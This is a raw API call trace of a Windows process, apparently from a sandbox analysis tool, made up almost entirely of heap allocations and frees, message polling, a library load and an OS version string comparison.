1 [0254.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0254.146] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0254.146] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0254.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0254.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0254.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0254.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0254.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0254.146] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.156] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0254.156] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0254.156] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0254.157] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0254.157] PeekMessageW (in: lpMsg=0x8bf0b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf0b0) returned 0 [0254.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0254.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0254.157] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0254.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0254.158] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0254.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0254.159] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0254.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0254.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0254.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.160] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0254.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0254.161] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0254.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0254.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0254.161] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0254.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0254.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0254.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0254.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0254.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0254.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0254.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0254.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0254.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0254.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0254.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0254.162] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0254.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0254.162] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0254.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0254.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0254.162] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0254.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0254.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a30 [0254.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0254.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1728 [0254.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4d8 | out: hHeap=0x25c0000) returned 1 [0254.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0254.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4d8 [0254.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0254.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0254.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0254.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0254.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0254.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.163] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0254.163] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0254.163] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x74d40000 [0254.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0254.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0254.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0254.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0254.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0254.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0254.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0254.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0254.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0254.164] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0254.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0254.164] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0254.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0254.164] CharUpperBuffW (in: lpsz="A5500B04258", cchLength=0xb | out: lpsz="A5500B04258") returned 0xb [0254.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0254.164] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0254.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0254.164] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2da8 [0254.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0254.165] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0254.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0254.166] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0254.166] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa00 [0254.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0254.167] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0254.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0254.168] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0254.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0254.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0254.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0254.168] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.168] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0254.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0254.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0254.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1428 [0254.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0254.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0254.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0254.169] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0254.169] CharUpperBuffW (in: lpsz="SSA5500B04258", cchLength=0xd | out: lpsz="SSA5500B04258") returned 0xd [0254.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0254.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0254.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0254.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0254.169] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0254.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0254.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0254.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d820 [0254.170] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0254.170] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0254.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0254.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0254.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.170] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0254.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0254.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0254.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0254.170] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0254.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0254.171] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17e8 [0254.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17e8 | out: hHeap=0x25c0000) returned 1 [0254.171] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0254.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0254.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0254.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c10 | out: hHeap=0x25c0000) returned 1 [0254.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0254.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0254.171] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0254.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0254.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0254.172] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0254.173] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0254.173] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.173] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0254.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0254.174] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0254.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0254.174] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0254.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0254.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0254.175] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0254.176] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0254.177] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17e8 [0254.177] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4f0 | out: hHeap=0x25c0000) returned 1 [0254.178] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0254.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4f0 [0254.179] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0254.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0254.180] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0254.181] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0254.181] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0254.181] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0254.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0254.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0254.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0254.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0254.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0254.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ad8 [0254.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0254.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1428 [0254.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0254.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0254.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0254.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0254.182] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0254.182] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0254.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0254.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0254.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0254.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0254.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0254.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0254.183] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0254.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0254.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0254.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0254.183] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0254.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0254.183] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17b8 [0254.184] CharUpperBuffW (in: lpsz="OSVersion", cchLength=0x9 | out: lpsz="OSVERSION") returned 0x9 [0254.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0254.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa18 [0254.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa748 [0254.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0254.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0254.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7c0 [0254.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0254.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0254.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0254.184] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18f8 [0254.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c18 | out: hHeap=0x25c0000) returned 1 [0254.184] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0254.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0254.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0254.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0254.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0254.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0254.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0254.185] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0254.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0254.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0254.186] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0254.186] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_7", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0254.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0254.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18f8 | out: hHeap=0x25c0000) returned 1 [0254.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0254.186] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0254.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0254.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0254.187] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0254.188] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0254.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0254.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0254.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0254.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0254.188] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 